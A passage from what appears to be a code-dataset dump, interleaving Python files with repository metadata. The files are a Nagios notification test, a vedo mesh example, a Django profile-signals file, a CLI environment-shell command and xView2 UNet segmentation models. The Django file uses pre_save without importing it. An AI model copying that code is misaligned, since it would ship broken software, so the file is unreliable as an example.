'NAGIOS_LASTHOSTSTATE': "UP",
'NAGIOS_LASTHOSTSTATEID': "0",
'NAGIOS_HOSTSTATETYPE': "HARD",
'NAGIOS_HOSTATTEMPT': "1",
'NAGIOS_MAXHOSTATTEMPTS': "3",
'NAGIOS_HOSTEVENTID': "0",
'NAGIOS_LASTHOSTEVENTID': "0",
'NAGIOS_HOSTPROBLEMID': "0",
'NAGIOS_LASTHOSTPROBLEMID': "0",
'NAGIOS_HOSTLATENCY': "0.123",
'NAGIOS_HOSTEXECUTIONTIME': "4.012",
'NAGIOS_HOSTDURATION': "35d 15h 31m 49s",
'NAGIOS_HOSTDURATIONSEC': "3079909",
'NAGIOS_HOSTDOWNTIME': "0",
'NAGIOS_HOSTPERCENTCHANGE': "0.0",
'NAGIOS_HOSTGROUPNAMES': "a_group,b_group",
'NAGIOS_LASTHOSTCHECK': "1260009929",
'NAGIOS_LASTHOSTSTATECHANGE': "1256929950",
'NAGIOS_LASTHOSTUP': "1260009939",
'NAGIOS_LASTHOSTDOWN': "0",
'NAGIOS_LASTHOSTUNREACHABLE': "0",
'NAGIOS_HOSTOUTPUT': "PING OK - Packet loss = 0%, RTA = 2.00 ms",
'NAGIOS_LONGHOSTOUTPUT': "",
'NAGIOS_HOSTPERFDATA': "rta=10.778000ms;3000.000000;5000.000000;0.000000 pl=0%;80;100;0",
'NAGIOS_HOSTCHECKCOMMAND': "check_host_alive",
'NAGIOS_HOSTACTIONURL': "",
'NAGIOS_HOSTNOTESURL': "",
'NAGIOS_HOSTNOTES': "",
'NAGIOS_TOTALHOSTSERVICES': "39",
'NAGIOS_TOTALHOSTSERVICESOK': "38",
'NAGIOS_TOTALHOSTSERVICESWARNING': "0",
'NAGIOS_TOTALHOSTSERVICESCRITICAL': "1",
'NAGIOS_TOTALHOSTSERVICESUNKNOWN': "0",
'NAGIOS_HOSTGROUPNAME': "a_group",
'NAGIOS_HOSTGROUPALIAS': "A Group",
'NAGIOS_HOSTGROUPMEMBERS': "localhost",
'NAGIOS_HOSTGROUPNOTES': "",
'NAGIOS_HOSTGROUPNOTESURL': "",
'NAGIOS_HOSTGROUPACTIONURL': "",
'NAGIOS_CONTACTNAME': "root",
'NAGIOS_CONTACTALIAS': "Mr. Big",
'NAGIOS_CONTACTEMAIL': "root@localhost",
'NAGIOS_CONTACTPAGER': "pager@localhost",
'NAGIOS_CONTACTGROUPNAMES': "admins,managers",
'NAGIOS_CONTACTGROUPNAME': "admins",
'NAGIOS_CONTACTGROUPALIAS': "Admins",
'NAGIOS_CONTACTGROUPMEMBERS': "root,luser",
'NAGIOS_NOTIFICATIONTYPE': "PROBLEM",
'NAGIOS_NOTIFICATIONRECIPIENTS': "root",
'NAGIOS_NOTIFICATIONISESCALATED': "0",
'NAGIOS_NOTIFICATIONAUTHOR': "",
'NAGIOS_NOTIFICATIONAUTHORNAME': "",
'NAGIOS_NOTIFICATIONAUTHORALIAS': "",
'NAGIOS_NOTIFICATIONCOMMENT': "",
'NAGIOS_NOTIFICATIONNUMBER': "1",
'NAGIOS_HOSTNOTIFICATIONNUMBER': "0",
'NAGIOS_HOSTNOTIFICATIONID': "0",
'NAGIOS_SERVICENOTIFICATIONNUMBER': "1",
'NAGIOS_SERVICENOTIFICATIONID': "409161",
'NAGIOS_LONGDATETIME': "Sun Dec 6 04:25:32 EST 2009",
'NAGIOS_SHORTDATETIME': "12-06-2009 04:25:33",
'NAGIOS_DATE': "12-06-2009",
'NAGIOS_TIME': "04:25:34",
'NAGIOS_TIMET': "1260091534",
'NAGIOS_MAINCONFIGFILE': "/path/to/nagios.cfg",
'NAGIOS_STATUSDATAFILE': "/path/to/status.dat",
'NAGIOS_RETENTIONDATAFILE': "/path/to/retention.dat",
'NAGIOS_OBJECTCACHEFILE': "/path/to/objects.cache",
'NAGIOS_TEMPFILE': "/path/to/nagios.tmp",
'NAGIOS_TEMPPATH': "/tmp",
'NAGIOS_LOGFILE': "/path/to/nagios.log",
'NAGIOS_RESOURCEFILE': "/path/to/resource.cfg",
'NAGIOS_COMMANDFILE': "/path/to/nagios.cmd",
'NAGIOS_PROCESSSTARTTIME': "1259966149",
'NAGIOS_EVENTSTARTTIME': "1259966149",
'NAGIOS_ADMINEMAIL': "root@localhost",
'NAGIOS_ADMINPAGER': "pager@localhost",
}
ENVIRONMENT_SERVICE = {
'NAGIOS_SERVICEDESC': "PING",
'NAGIOS_SERVICEDISPLAYNAME': "PING",
'NAGIOS_SERVICESTATE': "CRITICAL",
'NAGIOS_SERVICESTATEID': "2",
'NAGIOS_LASTSERVICESTATE': "CRITICAL",
'NAGIOS_LASTSERVICESTATEID': "2",
'NAGIOS_SERVICESTATETYPE': "HARD",
'NAGIOS_SERVICEATTEMPT': "3",
'NAGIOS_MAXSERVICEATTEMPTS': "3",
'NAGIOS_SERVICEISVOLATILE': "0",
'NAGIOS_SERVICEEVENTID': "56460",
'NAGIOS_LASTSERVICEEVENTID': "56405",
'NAGIOS_SERVICEPROBLEMID': "28201",
'NAGIOS_LASTSERVICEPROBLEMID': "0",
'NAGIOS_SERVICELATENCY': "0.357",
'NAGIOS_SERVICEEXECUTIONTIME': "0.000",
'NAGIOS_SERVICEDURATION': "0d 0h 0m 17s",
'NAGIOS_SERVICEDURATIONSEC': "17",
'NAGIOS_SERVICEDOWNTIME': "0",
'NAGIOS_SERVICEPERCENTCHANGE': "12.37",
'NAGIOS_SERVICEGROUPNAMES': "z_gorup,y_group",
'NAGIOS_LASTSERVICECHECK': "1260146052",
'NAGIOS_LASTSERVICESTATECHANGE': "1260146112",
'NAGIOS_LASTSERVICEOK': "1260146052",
'NAGIOS_LASTSERVICEWARNING': "1260091455",
'NAGIOS_LASTSERVIVECRITICAL': "1260146112",
'NAGIOS_LASTSERVICEUNKNOWN': "1257999616",
'NAGIOS_SERVICEOUTPUT': "PING CRITICAL - Packet loss = 60%, RTA = 0.38 ms",
'NAGIOS_LONGSERVICEOUTPUT': "Long Output\\nWith\\nextra lines",
'NAGIOS_SERVICEPERFDATA': "",
'NAGIOS_SERVICECHECKCOMMAND': "check_freshness",
'NAGIOS_SERVICEACTIONURL': "",
'NAGIOS_SERVICENOTESURL': "",
'NAGIOS_SERVICENOTES': "",
'NAGIOS_SERVICEGROUPNAME': "z_group",
'NAGIOS_SERVICEGROUPALIAS': "Z Group",
'NAGIOS_SERVICEGROUPMEMBERS': "localhost,PING,otherhost,PING",
'NAGIOS_SERVICEGROUPNOTESURL': "",
'NAGIOS_SERVICEGROUPNOTES': "",
}
ENVIRONMENT_SERVICE.update(ENVIRONMENT_HOST)
class MacrosTestCase(unittest.TestCase):
def setUp(self):
self.macros = notify.Macros(ENVIRONMENT_SERVICE)
def testPrefix(self):
for key in self.macros:
self.failIf(key.startswith("NAGIOS_"))
def testNewlines(self):
for key, value in self.macros.iteritems():
if key == "LONGSERVICEOUTPUT":
self.assert_(len(value.splitlines()) > 1)
else:
self.assert_(not value or len(value.splitlines()) == 1)
def testMissing(self):
self.assertRaises(notify.MissingMacro,
lambda: self.macros['DOESNOTEXIST'])
class NotificationTest(unittest.TestCase):
def setUp(self):
self.macros = {
'host': notify.Macros(ENVIRONMENT_HOST),
'service': notify.Macros(ENVIRONMENT_SERVICE)}
self.config = coil.parse(notify.DEFAULT_CONFIG)
def testSubject(self):
for t in ('host', 'service'):
obj = notify.Notification(t, self.macros[t], self.config)
self.assert_(obj.subject())
def testBody(self):
for t in ('host', 'service'):
obj = notify.Notification(t, self.macros[t], self.config)
long = obj.body()
self.assert_(long)
self.failIf(re.search('{\w+}', long))
obj.format = "short"
short = obj.body()
self.assert_(short)
self.failIf(re.search('{\w+}', short))
self.assert_(len(short) < len(long))
def testURLs(self):
config = self.config.copy()
config['urls.nagios'] ="https://testURLs/zomg/nagios"
config['urls.graphs'] ="https://testURLs/zomg/graphs"
for t in ('host', 'service'):
obj = notify.Notification(t, self.macros[t], config)
urls = obj.urls()
self.assert_(urls['nagios'].startswith(config['urls.nagios']))
self.assert_(urls['graphs'].startswith(config['urls.graphs']))
| true | true |
f72ec7f9188135bc2abd9576d4b4c2d59ae7a487 | 569 | py | Python | examples/basic/buildmesh.py | hadivafaii/vedo | 15f9adbd36d25c0212cbd4eb0c15af54c19f3819 | [
"CC0-1.0"
] | 836 | 2020-06-14T02:38:12.000Z | 2022-03-31T15:39:50.000Z | examples/basic/buildmesh.py | hadivafaii/vedo | 15f9adbd36d25c0212cbd4eb0c15af54c19f3819 | [
"CC0-1.0"
] | 418 | 2020-06-14T10:51:32.000Z | 2022-03-31T23:23:14.000Z | examples/basic/buildmesh.py | hadivafaii/vedo | 15f9adbd36d25c0212cbd4eb0c15af54c19f3819 | [
"CC0-1.0"
] | 136 | 2020-06-14T02:26:41.000Z | 2022-03-31T12:47:18.000Z | """Manually build a mesh from points and faces"""
from vedo import Mesh, printc, show
verts = [(50,50,50), (70,40,50), (50,40,80), (80,70,50)]
faces = [(0,1,2), (2,1,3), (1,0,3)]
# (the first triangle face is formed by vertex 0, 1 and 2)
# Build the polygonal Mesh object:
mesh = Mesh([verts, faces])
mesh.backColor('violet').lineColor('tomato').lineWidth(2)
labs = mesh.labels('id').c('black')
# retrieve them as numpy arrays
printc('points():\n', mesh.points(), c=3)
printc('faces(): \n', mesh.faces(), c=3)
show(mesh, labs, __doc__, viewup='z', axes=1).close()
| 31.611111 | 58 | 0.648506 | from vedo import Mesh, printc, show
verts = [(50,50,50), (70,40,50), (50,40,80), (80,70,50)]
faces = [(0,1,2), (2,1,3), (1,0,3)]
mesh = Mesh([verts, faces])
mesh.backColor('violet').lineColor('tomato').lineWidth(2)
labs = mesh.labels('id').c('black')
printc('points():\n', mesh.points(), c=3)
printc('faces(): \n', mesh.faces(), c=3)
show(mesh, labs, __doc__, viewup='z', axes=1).close()
| true | true |
f72ec8d5be139f6310464dc01e7c0f57e04b86ad | 38 | py | Python | tests/components/statsd/__init__.py | domwillcode/home-assistant | f170c80bea70c939c098b5c88320a1c789858958 | [
"Apache-2.0"
] | 30,023 | 2016-04-13T10:17:53.000Z | 2020-03-02T12:56:31.000Z | tests/components/statsd/__init__.py | jagadeeshvenkatesh/core | 1bd982668449815fee2105478569f8e4b5670add | [
"Apache-2.0"
] | 31,101 | 2020-03-02T13:00:16.000Z | 2022-03-31T23:57:36.000Z | tests/components/statsd/__init__.py | jagadeeshvenkatesh/core | 1bd982668449815fee2105478569f8e4b5670add | [
"Apache-2.0"
] | 11,956 | 2016-04-13T18:42:31.000Z | 2020-03-02T09:32:12.000Z | """Tests for the statsd component."""
| 19 | 37 | 0.684211 | true | true | |
f72eca4472be03ec523013a1e2a1d617e258713b | 590 | py | Python | users/signals.py | kipkoech-msojo/project_website | 137c8e100171dfda2f722a8e6d1079db87860a14 | [
"MIT"
] | null | null | null | users/signals.py | kipkoech-msojo/project_website | 137c8e100171dfda2f722a8e6d1079db87860a14 | [
"MIT"
] | null | null | null | users/signals.py | kipkoech-msojo/project_website | 137c8e100171dfda2f722a8e6d1079db87860a14 | [
"MIT"
] | null | null | null | from django.dispatch import receiver
from django.db.models.signals import post_save
from .models import Profile
from django.contrib.auth.models import User
@receiver(post_save, sender=User)
def create_user_profile(sender, instance, created, **kwargs):
if created:
Profile.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_user_profile(sender, instance, **kwargs):
instance.profile.save()
@receiver(pre_save,sender=User)
def create_hash_for_user(sender,instance,**kwargs):
if not instance.pk:
print(instance,'[[[[[[[[[[[[[[[[[[[[[') | 31.052632 | 61 | 0.732203 | from django.dispatch import receiver
from django.db.models.signals import post_save
from .models import Profile
from django.contrib.auth.models import User
@receiver(post_save, sender=User)
def create_user_profile(sender, instance, created, **kwargs):
if created:
Profile.objects.create(user=instance)
@receiver(post_save, sender=User)
def save_user_profile(sender, instance, **kwargs):
instance.profile.save()
@receiver(pre_save,sender=User)
def create_hash_for_user(sender,instance,**kwargs):
if not instance.pk:
print(instance,'[[[[[[[[[[[[[[[[[[[[[') | false | true |
f72eca7ec01c7f98779fd742ed2f63dd47c2895f | 1,623 | py | Python | client/fmcmds/env_shell.py | AlexRogalskiy/caastle | bb832c6828c6e97ac18d58ac0f23d8f61ff7bec3 | [
"Apache-2.0"
] | 19 | 2017-09-01T03:42:00.000Z | 2018-01-25T09:53:59.000Z | client/fmcmds/env_shell.py | mrhm-dev/caastle | bb832c6828c6e97ac18d58ac0f23d8f61ff7bec3 | [
"Apache-2.0"
] | 34 | 2017-08-30T14:11:16.000Z | 2017-12-16T01:52:44.000Z | client/fmcmds/env_shell.py | AlexRogalskiy/caastle | bb832c6828c6e97ac18d58ac0f23d8f61ff7bec3 | [
"Apache-2.0"
] | 4 | 2019-01-20T22:04:59.000Z | 2022-01-09T02:25:35.000Z | import ast
import json
import readline
from cliff.command import Command
import call_server as server
class EnvironmentShell(Command):
def get_parser(self, prog_name):
parser = super(EnvironmentShell, self).get_parser(prog_name)
parser.add_argument(dest='env_name',
help="Environment name")
return parser
def take_action(self, parsed_args):
env_name = parsed_args.env_name
response = server.TakeAction().get_environment(env_name)
if response:
response_json = json.loads(response)
env_output_config = ast.literal_eval(response_json['data']['env_definition'])
type = env_output_config['environment']['app_deployment']['type']
if type == 'local-docker':
print("Shell functionality not available for local deployment target.")
print("You can use docker commands from command-line instead.")
exit()
if response_json['data']['status'] == 'available':
while True:
command_string = raw_input('("exit" to quit, "help" to see commands) cld>')
command_string = command_string.strip()
if command_string == 'exit':
break
print("Running the command %s in the environment..." % command_string)
response = server.TakeAction().run_command(env_name, command_string)
print(response)
else:
print("Environment %s is not in appropriate state." % env_name)
| 37.744186 | 95 | 0.59581 | import ast
import json
import readline
from cliff.command import Command
import call_server as server
class EnvironmentShell(Command):
def get_parser(self, prog_name):
parser = super(EnvironmentShell, self).get_parser(prog_name)
parser.add_argument(dest='env_name',
help="Environment name")
return parser
def take_action(self, parsed_args):
env_name = parsed_args.env_name
response = server.TakeAction().get_environment(env_name)
if response:
response_json = json.loads(response)
env_output_config = ast.literal_eval(response_json['data']['env_definition'])
type = env_output_config['environment']['app_deployment']['type']
if type == 'local-docker':
print("Shell functionality not available for local deployment target.")
print("You can use docker commands from command-line instead.")
exit()
if response_json['data']['status'] == 'available':
while True:
command_string = raw_input('("exit" to quit, "help" to see commands) cld>')
command_string = command_string.strip()
if command_string == 'exit':
break
print("Running the command %s in the environment..." % command_string)
response = server.TakeAction().run_command(env_name, command_string)
print(response)
else:
print("Environment %s is not in appropriate state." % env_name)
| true | true |
f72ecb13aa6024c6caa779e5cb7893e409d32f30 | 10,988 | py | Python | xview/models/unetv2.py | mayankj/xView2-Solution | 804aa15a3d9f28c7c1d73e50ce0ed0c359a0493e | [
"MIT"
] | null | null | null | xview/models/unetv2.py | mayankj/xView2-Solution | 804aa15a3d9f28c7c1d73e50ce0ed0c359a0493e | [
"MIT"
] | null | null | null | xview/models/unetv2.py | mayankj/xView2-Solution | 804aa15a3d9f28c7c1d73e50ce0ed0c359a0493e | [
"MIT"
] | null | null | null | from functools import partial
from typing import List, Union, Callable
import torch
from pytorch_toolbelt.modules import ABN, ACT_RELU, ACT_SWISH
from pytorch_toolbelt.modules import encoders as E
from pytorch_toolbelt.modules.decoders import DecoderModule
from pytorch_toolbelt.modules.encoders import EncoderModule
from torch import nn
from torch.nn import functional as F
from .common import disaster_type_classifier, damage_types_classifier
from ..dataset import OUTPUT_MASK_KEY, DISASTER_TYPE_KEY, DISASTER_TYPES, DAMAGE_TYPE_KEY, DAMAGE_TYPES
__all__ = ["UnetV2SegmentationModel"]
class ConvBottleneck(nn.Module):
def __init__(self, in_channels, out_channels):
super().__init__()
self.seq = nn.Sequential(nn.Conv2d(in_channels, out_channels, 3, padding=1), nn.ReLU(inplace=True))
def forward(self, dec, enc):
x = torch.cat([dec, enc], dim=1)
return self.seq(x)
class UnetDecoderBlock(nn.Module):
def __init__(self, in_channels, middle_channels, out_channels):
super().__init__()
self.layer = nn.Sequential(
nn.Upsample(scale_factor=2), nn.Conv2d(in_channels, out_channels, 3, padding=1), nn.ReLU(inplace=True)
)
def forward(self, x):
return self.layer(x)
class UNetDecoderV2(DecoderModule):
def __init__(
self,
feature_maps: List[int],
decoder_features: List[int],
mask_channels: int,
last_upsample_filters=None,
dropout=0.0,
abn_block=ABN,
):
super().__init__()
if not isinstance(decoder_features, list):
decoder_features = [decoder_features * (2 ** i) for i in range(len(feature_maps))]
if last_upsample_filters is None:
last_upsample_filters = decoder_features[0]
self.encoder_features = feature_maps
self.decoder_features = decoder_features
self.decoder_stages = nn.ModuleList([self.get_decoder(idx) for idx in range(0, len(self.decoder_features))])
self.bottlenecks = nn.ModuleList(
[
ConvBottleneck(self.encoder_features[-i - 2] + f, f)
for i, f in enumerate(reversed(self.decoder_features[:]))
]
)
self.output_filters = decoder_features
self.last_upsample = UnetDecoderBlock(decoder_features[0], last_upsample_filters, last_upsample_filters)
self.final = nn.Conv2d(last_upsample_filters, mask_channels, kernel_size=1)
def get_decoder(self, layer):
in_channels = (
self.encoder_features[layer + 1]
if layer + 1 == len(self.decoder_features)
else self.decoder_features[layer + 1]
)
return UnetDecoderBlock(in_channels, self.decoder_features[layer], self.decoder_features[max(layer, 0)])
def forward(self, feature_maps):
last_dec_out = feature_maps[-1]
x = last_dec_out
for idx, bottleneck in enumerate(self.bottlenecks):
rev_idx = -(idx + 1)
decoder = self.decoder_stages[rev_idx]
x = decoder(x)
x = bottleneck(x, feature_maps[rev_idx - 1])
x = self.last_upsample(x)
f = self.final(x)
return f
class UnetV2SegmentationModel(nn.Module):
def __init__(
self,
encoder: EncoderModule,
num_classes: int,
disaster_type_classes: int,
damage_type_classes: int,
unet_channels: List[int],
dropout=0.25,
abn_block: Union[ABN, Callable[[int], nn.Module]] = ABN,
full_size_mask=True,
):
super().__init__()
self.encoder = encoder
feature_maps = [2 * fm for fm in encoder.output_filters]
self.decoder = UNetDecoderV2(
feature_maps=feature_maps,
decoder_features=unet_channels,
mask_channels=num_classes,
dropout=dropout,
abn_block=abn_block,
)
self.full_size_mask = full_size_mask
if disaster_type_classes is not None:
self.disaster_type_classifier = disaster_type_classifier(
feature_maps[-1], disaster_type_classes, dropout=dropout
)
else:
self.disaster_type_classifier = None
if damage_type_classes is not None:
self.damage_types_classifier = damage_types_classifier(
feature_maps[-1], damage_type_classes, dropout=dropout
)
else:
self.damage_types_classifier = None
def forward(self, x):
batch_size = x.size(0)
pre, post = x[:, 0:3, ...], x[:, 3:6, ...]
if self.training:
x = torch.cat([pre, post], dim=0)
features = self.encoder(x)
features = [torch.cat([f[0:batch_size], f[batch_size : batch_size * 2]], dim=1) for f in features]
else:
pre_features, post_features = self.encoder(pre), self.encoder(post)
features = [torch.cat([pre, post], dim=1) for pre, post in zip(pre_features, post_features)]
# Decode mask
mask = self.decoder(features)
if self.full_size_mask:
mask = F.interpolate(mask, size=x.size()[2:], mode="bilinear", align_corners=False)
output = {OUTPUT_MASK_KEY: mask}
if self.disaster_type_classifier is not None:
disaster_type = self.disaster_type_classifier(features[-1])
output[DISASTER_TYPE_KEY] = disaster_type
if self.damage_types_classifier is not None:
damage_types = self.damage_types_classifier(features[-1])
output[DAMAGE_TYPE_KEY] = damage_types
return output
def efficientb3_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.EfficientNetB3Encoder(pretrained=pretrained,
layers=[0, 1, 2, 4, 6],
abn_params={"activation": ACT_RELU})
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[64, 128, 256, 256],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
def densenet121_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.DenseNet121Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[64, 128, 256, 256],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
def densenet169_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.DenseNet169Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[128, 128, 256, 256],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
def resnet18_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.Resnet18Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[64, 128, 256, 256],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
def resnet34_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.Resnet34Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[64, 128, 256, 256],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
def resnet50_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.Resnet50Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[96, 128, 256, 256],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
def resnet101_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.Resnet101Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[64, 128, 256, 384],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
def seresnext50_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.SEResNeXt50Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[64, 128, 256, 256],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
def seresnext101_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.SEResNeXt101Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[128, 128, 256, 384],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
| 38.554386 | 117 | 0.650983 | from functools import partial
from typing import List, Union, Callable
import torch
from pytorch_toolbelt.modules import ABN, ACT_RELU, ACT_SWISH
from pytorch_toolbelt.modules import encoders as E
from pytorch_toolbelt.modules.decoders import DecoderModule
from pytorch_toolbelt.modules.encoders import EncoderModule
from torch import nn
from torch.nn import functional as F
from .common import disaster_type_classifier, damage_types_classifier
from ..dataset import OUTPUT_MASK_KEY, DISASTER_TYPE_KEY, DISASTER_TYPES, DAMAGE_TYPE_KEY, DAMAGE_TYPES
__all__ = ["UnetV2SegmentationModel"]
class ConvBottleneck(nn.Module):
def __init__(self, in_channels, out_channels):
super().__init__()
self.seq = nn.Sequential(nn.Conv2d(in_channels, out_channels, 3, padding=1), nn.ReLU(inplace=True))
def forward(self, dec, enc):
x = torch.cat([dec, enc], dim=1)
return self.seq(x)
class UnetDecoderBlock(nn.Module):
def __init__(self, in_channels, middle_channels, out_channels):
super().__init__()
self.layer = nn.Sequential(
nn.Upsample(scale_factor=2), nn.Conv2d(in_channels, out_channels, 3, padding=1), nn.ReLU(inplace=True)
)
def forward(self, x):
return self.layer(x)
class UNetDecoderV2(DecoderModule):
def __init__(
self,
feature_maps: List[int],
decoder_features: List[int],
mask_channels: int,
last_upsample_filters=None,
dropout=0.0,
abn_block=ABN,
):
super().__init__()
if not isinstance(decoder_features, list):
decoder_features = [decoder_features * (2 ** i) for i in range(len(feature_maps))]
if last_upsample_filters is None:
last_upsample_filters = decoder_features[0]
self.encoder_features = feature_maps
self.decoder_features = decoder_features
self.decoder_stages = nn.ModuleList([self.get_decoder(idx) for idx in range(0, len(self.decoder_features))])
self.bottlenecks = nn.ModuleList(
[
ConvBottleneck(self.encoder_features[-i - 2] + f, f)
for i, f in enumerate(reversed(self.decoder_features[:]))
]
)
self.output_filters = decoder_features
self.last_upsample = UnetDecoderBlock(decoder_features[0], last_upsample_filters, last_upsample_filters)
self.final = nn.Conv2d(last_upsample_filters, mask_channels, kernel_size=1)
def get_decoder(self, layer):
in_channels = (
self.encoder_features[layer + 1]
if layer + 1 == len(self.decoder_features)
else self.decoder_features[layer + 1]
)
return UnetDecoderBlock(in_channels, self.decoder_features[layer], self.decoder_features[max(layer, 0)])
def forward(self, feature_maps):
last_dec_out = feature_maps[-1]
x = last_dec_out
for idx, bottleneck in enumerate(self.bottlenecks):
rev_idx = -(idx + 1)
decoder = self.decoder_stages[rev_idx]
x = decoder(x)
x = bottleneck(x, feature_maps[rev_idx - 1])
x = self.last_upsample(x)
f = self.final(x)
return f
class UnetV2SegmentationModel(nn.Module):
def __init__(
self,
encoder: EncoderModule,
num_classes: int,
disaster_type_classes: int,
damage_type_classes: int,
unet_channels: List[int],
dropout=0.25,
abn_block: Union[ABN, Callable[[int], nn.Module]] = ABN,
full_size_mask=True,
):
super().__init__()
self.encoder = encoder
feature_maps = [2 * fm for fm in encoder.output_filters]
self.decoder = UNetDecoderV2(
feature_maps=feature_maps,
decoder_features=unet_channels,
mask_channels=num_classes,
dropout=dropout,
abn_block=abn_block,
)
self.full_size_mask = full_size_mask
if disaster_type_classes is not None:
self.disaster_type_classifier = disaster_type_classifier(
feature_maps[-1], disaster_type_classes, dropout=dropout
)
else:
self.disaster_type_classifier = None
if damage_type_classes is not None:
self.damage_types_classifier = damage_types_classifier(
feature_maps[-1], damage_type_classes, dropout=dropout
)
else:
self.damage_types_classifier = None
def forward(self, x):
batch_size = x.size(0)
pre, post = x[:, 0:3, ...], x[:, 3:6, ...]
if self.training:
x = torch.cat([pre, post], dim=0)
features = self.encoder(x)
features = [torch.cat([f[0:batch_size], f[batch_size : batch_size * 2]], dim=1) for f in features]
else:
pre_features, post_features = self.encoder(pre), self.encoder(post)
features = [torch.cat([pre, post], dim=1) for pre, post in zip(pre_features, post_features)]
mask = self.decoder(features)
if self.full_size_mask:
mask = F.interpolate(mask, size=x.size()[2:], mode="bilinear", align_corners=False)
output = {OUTPUT_MASK_KEY: mask}
if self.disaster_type_classifier is not None:
disaster_type = self.disaster_type_classifier(features[-1])
output[DISASTER_TYPE_KEY] = disaster_type
if self.damage_types_classifier is not None:
damage_types = self.damage_types_classifier(features[-1])
output[DAMAGE_TYPE_KEY] = damage_types
return output
def efficientb3_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.EfficientNetB3Encoder(pretrained=pretrained,
layers=[0, 1, 2, 4, 6],
abn_params={"activation": ACT_RELU})
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[64, 128, 256, 256],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
def densenet121_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.DenseNet121Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[64, 128, 256, 256],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
def densenet169_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.DenseNet169Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[128, 128, 256, 256],
dropout=dropout,
abn_block=partial(ABN, activation=ACT_RELU),
)
def resnet18_unet_v2(input_channels=6, num_classes=5, dropout=0.0, pretrained=True, classifiers=True):
encoder = E.Resnet18Encoder(pretrained=pretrained, layers=[0, 1, 2, 3, 4])
return UnetV2SegmentationModel(
encoder,
num_classes=num_classes,
disaster_type_classes=len(DISASTER_TYPES) if classifiers else None,
damage_type_classes=len(DAMAGE_TYPES) if classifiers else None,
unet_channels=[64, 128, 256, 256],
dropout=dropout,
